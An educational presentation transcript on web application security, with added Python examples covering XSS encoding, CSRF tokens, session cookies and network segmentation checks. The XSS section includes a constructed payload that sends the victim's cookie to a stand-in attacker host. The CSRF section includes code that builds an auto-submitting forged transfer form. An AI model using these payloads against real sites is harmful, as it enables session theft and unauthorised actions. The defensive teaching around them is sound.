Abdul Wahab's presentation covers topics related to common cybersecurity vulnerabilities and exploits including cross-site scripting, cross-site request forgery, session management, SQL injection, secure software testing, and replicating vulnerabilities. It discusses these topics in detail providing examples of each vulnerability type and strategies to prevent exploits such as input validation, output encoding, secure cookies, penetration testing, and security awareness training. The presentation aims to educate audiences on how these vulnerabilities work and best practices for secure development.
2. TOPICS TO BE COVERED
-CROSS-SITE SCRIPTING
-CROSS SITE REQUEST FORGERY
-SESSION MANAGEMENT
-SQL INJECTION
-SECURE SOFTWARE TESTING
-REPLICATION OF VULNERABILITIES AND EXPLOITATION
3. CROSS-SITE SCRIPTING
•Cross-site scripting (XSS) is an attack in which an attacker injects
malicious script into a page served by a trusted application or
website, so that the victim's browser runs it with that site's origin
and privileges.
•For reflected XSS, attackers often initiate the attack by sending a
malicious link to a user and enticing the user to click it; stored XSS
needs no link, because the application itself delivers the payload to
every visitor of the affected page.
4. CONT..
•If the app or website lacks proper output encoding or sanitization,
the injected script executes in the user's browser, inside the origin
of the vulnerable site, not on the user's operating system.
•As a result, the attacker can steal the user's active session cookie
(unless it is marked HttpOnly), read or modify page content, and issue
requests to the application as that user.
5. TYPES
Stored XSS:
Takes place when the malicious payload is stored by the application
(in a database, comment, profile field, log, and so on). It renders to
other users when that data is requested, if there is no output encoding
or sanitization.
Reflected XSS:
Occurs when a web application echoes attacker-provided strings from the
current request (URL parameters, form fields, headers) straight into
the response, so that the victim's browser executes part of the string
as code. The payload is delivered through a crafted link and echoes
back in the response to that one request.
DOM-based XSS:
Takes place when client-side JavaScript on the page reads
attacker-controlled data from the document object model (DOM), for
example location.hash or document.URL, and writes it into a dangerous
sink such as innerHTML, document.write or eval. The server response
itself may be clean: the attacker crafts a malicious URL, tricks the
user into clicking it, and the page's own script executes the payload.
As with the other types, the attacker can then steal the user's active
session information, capture keystrokes, and so on.
9. •Ensure that web application development aligns with OWASP's XSS
Prevention Cheat Sheet: encode untrusted data for the exact context it
is inserted into (HTML body, attribute, JavaScript, URL), validate input
against an allowlist, and add a Content Security Policy as defense in
depth.
•After remediation, perform penetration testing to confirm that the
fix was successful and that the same data is not rendered unencoded in
some other context.
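The following is an added example, not code from the presentation: it shows the stored/reflected case above as a comment renderer that concatenates untrusted data into HTML, beside the same renderer with HTML-context output encoding, and a URL-attribute check for the one context where encoding alone is not enough. The comment text, the attacker payload and the helper names are constructed for this illustration.

```python
# Added example (not from the presentation): context-aware output encoding
# against stored and reflected XSS. The payload, helper names and rendered
# markup are constructed for this illustration.
import html
from urllib.parse import urlsplit

# A payload as an attacker might save it in a comment field (constructed).
MALICIOUS_COMMENT = "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"


def render_comment_unsafe(author: str, body: str) -> str:
    """Vulnerable: untrusted data is concatenated straight into HTML."""
    return f"<div class='comment'><b>{author}</b>: {body}</div>"


def escape_for_html(value: str) -> str:
    """HTML body / quoted-attribute context: encode & < > " and ' so the
    data can never open a tag or close the surrounding attribute."""
    return html.escape(value, quote=True)


def render_comment_safe(author: str, body: str) -> str:
    """Fixed: every untrusted value is encoded for the HTML context."""
    return (
        "<div class='comment'><b>"
        + escape_for_html(author)
        + "</b>: "
        + escape_for_html(body)
        + "</div>"
    )


def safe_href(url: str) -> str:
    """URL-attribute context: encoding does not stop javascript: links,
    so validate the scheme against an allowlist first and fall back to a
    harmless anchor when the check fails. Relative paths would need
    their own rule; this example only accepts absolute http(s) URLs."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return escape_for_html(url)


def looks_executable(rendered_html: str) -> bool:
    """Crude check used here only to show the difference: a literal
    <script> tag or an inline event handler survived into the markup."""
    lowered = rendered_html.lower()
    return "<script" in lowered or " onerror=" in lowered or " onload=" in lowered


if __name__ == "__main__":
    print(render_comment_unsafe("mallory", MALICIOUS_COMMENT))
    print(render_comment_safe("mallory", MALICIOUS_COMMENT))
    print(safe_href("javascript:alert(document.cookie)"))
    print(safe_href("https://example.org/profile?id=1&tab=2"))
```

The safe renderer does nothing clever: it simply refuses to let data decide markup. Note that `escape_for_html` is correct only for the HTML body and quoted attributes; data placed inside a `<script>` block or a CSS value needs the encoder for that context, which is the point of the cheat sheet's per-context rules.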
11. CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an
authenticated user's browser to submit a request to a Web application
against which the user is currently authenticated.
CSRF attacks exploit the trust a Web application has in an
authenticated user: the browser attaches the session cookie to the
forged request automatically, so the application sees it as the
user's own.
12. CONT..
A Cross Site Request Forgery attack exploits a vulnerability in a Web
application if it cannot differentiate between a request generated
intentionally by an individual user and a request generated through
that user's browser without their consent.
CONT…
Social engineering platforms (email, chat, forums) are often used by
attackers to launch a CSRF attack.
13. This tricks the victim into clicking a URL, or simply viewing a
page, that contains a maliciously crafted, unauthorized request for a
particular Web application. No click is strictly required: an <img>
tag or an auto-submitting form on the attacker's page fires the
request as soon as the page renders.
TO PERFORM THIS ATTACK
To carry out a successful CSRF attack, consider the following:
•The success of a CSRF attack depends on a user's session with a
vulnerable application. The attack will only be successful if the
user is in an active session with the vulnerable application and the
browser attaches the session cookie to a cross-site request (the
SameSite cookie attribute restricts exactly this).
14. •An attacker must find a valid URL to maliciously craft. The URL
needs to have a state-changing effect on the target application;
requests that only read data give the attacker nothing, since the
response goes to the victim's browser, not to the attacker.
CONT..
•An attacker also needs to find the right values for the URL
parameters. Otherwise, the target application might reject the
malicious request. This is what anti-CSRF tokens rely on: a
per-session random value that the attacker cannot predict is required
in every state-changing request, so the "right values" can never be
guessed.
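The following is an added example, not code from the presentation, covering the three conditions just listed and the corresponding server-side defence: the page an attacker would host to fire a state-changing request with the right parameter values, and a synchronizer-token check that makes the third condition impossible to satisfy. The target URL, form fields and session dictionary are constructed for this illustration.

```python
# Added example (not from the presentation): the attacker's auto-submitting
# page and the server-side synchronizer-token check that defeats it. The
# target URL, form fields and session layout are constructed.
import hmac
import secrets
from html import escape

TARGET = "https://bank.example/transfer"   # constructed state-changing endpoint


def forged_page(target: str, params: dict) -> str:
    """What the attacker hosts: a form carrying the guessed parameter
    values that submits itself as soon as the victim's browser renders
    it. The browser attaches the target site's session cookie by itself,
    which is condition 1 above."""
    fields = "".join(
        f'<input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in params.items()
    )
    return (
        f'<form id="f" action="{escape(target)}" method="POST">{fields}</form>'
        "<script>document.getElementById('f').submit()</script>"
    )


def issue_csrf_token(session: dict) -> str:
    """Server: one unpredictable token per session, kept server-side and
    embedded as a hidden field in every legitimate form."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def transfer_is_authorized(session: dict, form: dict) -> tuple:
    """Server: refuse a state-changing request unless it carries the
    session's token. compare_digest keeps the comparison constant-time
    so the token cannot be recovered byte by byte from timing."""
    if not session.get("authenticated"):
        return False, "no active session"
    expected = session.get("csrf")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    victim_session = {"authenticated": True, "user": "alice"}
    token = issue_csrf_token(victim_session)
    attacker_form = {"to": "mallory", "amount": "1000"}
    print(forged_page(TARGET, attacker_form))
    # The forged request has every parameter right except the token.
    print(transfer_is_authorized(victim_session, attacker_form))
    # A form rendered by the application itself includes the token.
    print(transfer_is_authorized(victim_session, {**attacker_form, "csrf_token": token}))
```

The attacker's page can be served from any origin; it never needs to read the response, which is why the same-origin policy does not prevent the attack. The token defeats it because the attacker's page cannot read the victim's copy of the application's form to learn the token value.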
15. SESSION MANAGEMENT
Session management is used to facilitate secure interactions
between a user and some service or application and applies
to a sequence of requests and responses associated with that
particular user.
16. CONT…
Session tokens serve to identify a user’s session within the
HTTP traffic being exchanged between the application and
all of its users.
Each request and response made will have an associated
session token which allows the application to remember
distinct information about the client using it.
17. CONT…
Session cookies were designed to help manage sessions: the browser
stores the token and sends it with every later request to the same
site, which is why the token has to be protected as carefully as the
password that produced it.
19. PREVENTIONS
• Setting secure HTTP flags on cookies:
Avoid sending sensitive traffic over unencrypted channels, i.e. HTTP.
Set the Secure flag, which tells the browser to send the cookie only
over encrypted connections such as HTTPS. Set HttpOnly as well, so that
script injected through XSS cannot read the cookie, and SameSite, so
that the browser does not attach it to cross-site requests.
20. CONT..
• Generation of new session cookies
New session token generation should be ensured at every step of the
authentication and interaction process, i.e. when a
21. CONT…
user visits an application or website and, above all, when the user
gets authenticated. Re-issuing the token at login prevents session
fixation, where an attacker plants a token they already know before
the victim authenticates.
• Session cookies configuration
Session tokens should not be easily guessable; they should be long,
unique and unpredictable, generated from a cryptographically secure
random source. Doing so will decrease the chances of an attacker being
successful in using brute force
22. to figure out the session token. The expiration time of
persistent cookies should be no longer than 30 minutes,
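The following is an added example, not code from the presentation, putting the three prevention points above into one place: an unpredictable token from the OS random source, the Set-Cookie attributes discussed, rotation of the identifier at login, and a 30-minute idle timeout. The store, the injectable clock and the cookie name are constructed for this illustration.

```python
# Added example (not from the presentation): unpredictable session tokens,
# hardened cookie attributes, token rotation at login and an idle timeout.
# The in-memory store, clock handling and cookie name are constructed.
import secrets
import time
from http.cookies import SimpleCookie

COOKIE_NAME = "sid"
IDLE_TIMEOUT = 30 * 60          # seconds; the 30-minute limit from the slide


def new_session_id() -> str:
    """256 bits from the OS CSPRNG: long, unique and unpredictable, so
    brute force or guessing is infeasible."""
    return secrets.token_hex(32)


def session_cookie(sid: str) -> str:
    """Set-Cookie header value with Secure (HTTPS only), HttpOnly (not
    readable by script, so XSS cannot exfiltrate it) and SameSite=Strict
    (not sent on cross-site requests, which also blunts CSRF)."""
    c = SimpleCookie()
    c[COOKIE_NAME] = sid
    c[COOKIE_NAME]["secure"] = True
    c[COOKIE_NAME]["httponly"] = True
    c[COOKIE_NAME]["samesite"] = "Strict"
    c[COOKIE_NAME]["path"] = "/"
    c[COOKIE_NAME]["max-age"] = IDLE_TIMEOUT
    return c[COOKIE_NAME].OutputString()


class SessionStore:
    def __init__(self, now=time.time):
        self._now = now            # injectable clock so the timeout is testable
        self._sessions = {}

    def start(self) -> str:
        """Anonymous session when the visitor first arrives."""
        sid = new_session_id()
        self._sessions[sid] = {"user": None, "last_seen": self._now()}
        return sid

    def login(self, old_sid: str, user: str) -> str:
        """Rotate the identifier at authentication. The pre-login id is
        discarded, so an id fixated by an attacker is useless afterwards."""
        self._sessions.pop(old_sid, None)
        sid = new_session_id()
        self._sessions[sid] = {"user": user, "last_seen": self._now()}
        return sid

    def lookup(self, sid: str):
        """Return the session for sid, or None if unknown or idle too long.
        A successful lookup refreshes the idle timer."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        if self._now() - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        sess["last_seen"] = self._now()
        return sess


if __name__ == "__main__":
    store = SessionStore()
    anon = store.start()
    authed = store.login(anon, "alice")
    print(session_cookie(authed))
    print(store.lookup(anon), store.lookup(authed)["user"])
```

The server-side store is what makes rotation and expiry enforceable: a token the server has forgotten is worthless no matter how long the browser keeps the cookie, which is the property the Max-Age attribute alone cannot give you.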
SQL INJECTION
•A SQL injection attack consists of insertion or “injection” of a
SQL query via the input data from the client to the application.
23. CONT…
•A successful SQL injection exploit can read sensitive data from
the database, modify database data (Insert/Update/Delete),
execute administration operations on the database (such as
shutdown the DBMS), recover the content of a given file
present on the DBMS file system and in some cases issue
commands to the operating system.
24. CONT…
•SQL injection attacks allow attackers to spoof identity, tamper with
existing data, cause repudiation issues such as voiding transactions or
changing balances, allow the complete disclosure of all data on the
system, destroy the data or make it otherwise unavailable, and become
administrators of the database server.
SQL injection attack occurs when:
25. CONT…
1. Unintended data enters a program from an untrusted source.
2. The data is used to dynamically construct a SQL query, so that the
data is interpreted as part of the query's structure rather than as a
plain value.
PREVENTIONS
• Train and maintain awareness
• Don't trust any user input
26. • Use whitelists (allowlists), not blacklists
• Adopt the latest technologies
• Employ verified mechanisms, above all parameterized queries (prepared
statements), so that user data is always bound as a value and can never
change the structure of the query
28. SECURE SOFTWARE TESTING
Cybersecurity has turned into a major concern as hacking activities
have reached threatening levels. A breach directly exposes personal
information, and it is essential to understand the different forms of
cyber-attack that can impact an individual or an organization.
29. CONT…
It is surprising to know that approximately $5.2 trillion in value
would be put at stake due to cyberattacks during the period between
2019 and 2023.
30. The correct use of software testing measures is seen as the key to
restricting hacking incidents. In the past few years, this process has
been gaining popularity and software testing has emerged as a trusted
shield against cyber attacks.
CONT…
You can include software testing as part of your organization's
working model. The most basic step is to hire a
31. team of software experts skilled in security design.
Furthermore, it is important to put in place specific quality criteria
(security requirements, code review, static analysis, dependency
checks) at each stage of the pipeline, so that security is maintained
at all levels as the software crosses the different stages.
33. CONT...
PENETRATION TESTING:
Penetration testing is a technique that closely resembles a
cyberattack, or rather is an intentional, authorized cyber-attack made
on the application to identify its exploitable vulnerabilities.
Moreover, penetration testing is a highly effective practice that helps
meet
34. CONT…
the goals related to web application security, since its findings show
where protections such as the Web Application Firewall, and the
application's own input handling behind it, need to improve.
Intelligent System Security Checks
Penetration testing is a test design arrangement made to work on
security against any attempt at hacking. Even the tools used during
penetration testing are made to
35. CONT…
replicate real cyber-attacks, with the objective of finding and
exercising system vulnerabilities before an attacker does.
Underline Weak Segments
Another significant aspect of using the penetration testing approach
is to identify weak links within the software code. The practice
improves the scope for protecting the personal
36. CONT…
user data, card details, or any transactional record that might be
under threat.
Added Network Security
Penetration testing is a powerful technique that could help developers
and software testers to work on improving the security of high-speed
networks such as 5G, as well as of the applications running on the
network.
38. REPLICATION OF VULNERABILITIES AND EXPLOITATION
Poor data backup and recovery :
With the recent threat of ransomware looming large, along
with traditional disasters and other failures, organizations
have a pressing need to back up and recover data.
Unfortunately, many organizations don't excel in this area
due to a lack of sound backup and recovery options.
39. PREVENTION
Most organizations need a multi-layered backup and recovery strategy.
This should include data center storage snapshots and replication,
database storage, tape or disk backups, and end user storage (often
cloud-based). At least one copy should be offline or immutable, so that
ransomware which reaches the network cannot encrypt the backups along
with the data, and restores should be rehearsed regularly rather than
assumed to work.
Poor network segmentation and monitoring
Many attackers rely on weak network segmentation and
monitoring to gain full access to systems in a network subnet
40. CONT…
once they've gained initial access. This huge cybersecurity
vulnerability has been common in many large enterprise
networks for many years.
Organizations should focus on carefully controlling network
access among systems within subnets, and building better
detection and alerting strategies for lateral movement
41. PREVENTION
between systems that have no business communicating with
one another.
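The following is an added example, not code from the presentation: a minimal policy check that does what the paragraph above asks for, flagging connections between subnets that have no business communicating and peer-to-peer traffic inside the workstation subnet on the ports lateral movement typically uses. The zones, the allowed-communication policy and the flow records are constructed for this illustration; in practice the same logic would be fed NetFlow, firewall or EDR connection data.

```python
# Added example (not from the presentation): a segmentation-policy check over
# connection records. Zones, policy and the sample flow lines are constructed.
import ipaddress

ZONES = {
    "workstations": ipaddress.ip_network("10.10.0.0/16"),
    "web":          ipaddress.ip_network("10.20.0.0/24"),
    "db":           ipaddress.ip_network("10.30.0.0/24"),
    "admin":        ipaddress.ip_network("10.99.0.0/24"),
}

# (source zone, destination zone) -> allowed destination ports.
# Anything not listed here is a segmentation violation.
POLICY = {
    ("workstations", "web"): {443},
    ("web", "db"):           {5432},
    ("admin", "web"):        {22, 443},
    ("admin", "db"):         {22, 5432},
}

# Ports used for host-to-host administration (SMB, RDP, WinRM): the
# classic lateral-movement channels between workstations.
LATERAL_PORTS = {445, 3389, 5985, 5986}

# Constructed flow records in the form "timestamp src dst dport proto".
SAMPLE_FLOWS = """\
2024-05-01T09:00:01 10.10.4.21 10.20.0.5 443 tcp
2024-05-01T09:00:02 10.20.0.5 10.30.0.7 5432 tcp
2024-05-01T09:03:10 10.10.4.21 10.10.4.40 445 tcp
2024-05-01T09:03:11 10.10.4.21 10.30.0.7 5432 tcp
2024-05-01T09:03:12 10.10.4.21 10.99.0.9 22 tcp
2024-05-01T09:04:00 10.99.0.9 10.30.0.7 22 tcp
"""


def zone_of(ip: str):
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def check_flow(src: str, dst: str, dport: int):
    """Return None if the flow is allowed, otherwise a short reason."""
    sz, dz = zone_of(src), zone_of(dst)
    if sz is None or dz is None:
        return "unknown zone"
    if sz == dz:
        if sz == "workstations" and dport in LATERAL_PORTS:
            return f"workstation-to-workstation on port {dport}"
        return None
    if dport not in POLICY.get((sz, dz), set()):
        return f"{sz} -> {dz} on port {dport} not permitted"
    return None


def find_violations(log_text: str):
    """Parse 'timestamp src dst dport proto' lines and return the
    offending ones together with the reason each was flagged."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, _proto = line.split()
        reason = check_flow(src, dst, int(dport))
        if reason:
            hits.append((ts, src, dst, int(dport), reason))
    return hits


if __name__ == "__main__":
    for hit in find_violations(SAMPLE_FLOWS):
        print(*hit)
```

On the sample data the first two flows match the policy, the admin host reaching the database over SSH is permitted, and the three flows from the workstation 10.10.4.21 (SMB to a neighbouring workstation, direct access to the database tier, SSH to the admin subnet) are exactly the pattern of an attacker pivoting from an initial foothold. The value of the check is that it is written against what should happen, so it does not need a signature for each new tool.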
Weak authentication and credential management
One of the most common causes of compromise and breaches is a lack of
sound credential management. People use the same
42. CONT…
password over and over, and many systems and services support weak
authentication practices.
For most organizations, implementing stringent password controls can
help. This may consist of longer passwords, screening new passwords
against lists of known-breached ones, and multi-factor authentication
in front of anything reachable from the internet. Mandatory periodic
password changes were long part of this advice, but current guidance
(NIST SP 800-63B) recommends against them unless there is evidence of
compromise, since forced rotation pushes users toward predictable
variations of the same password.
43. PREVENTION
Poor security awareness
The most common cause of successful phishing, pretexting
and other social engineering attacks is a lack of sound
security awareness training and end-user validation.
Organizations are still struggling with how to train users to
look for social engineering attempts and report them.
44. CONT…
More organizations need to conduct regular training exercises,
including phishing tests, pretexting and additional social engineering
as needed, and to make reporting a suspected attempt easy and blameless
so that the first user who notices one becomes the detection. Many
training programs are available to help reinforce security awareness
concepts.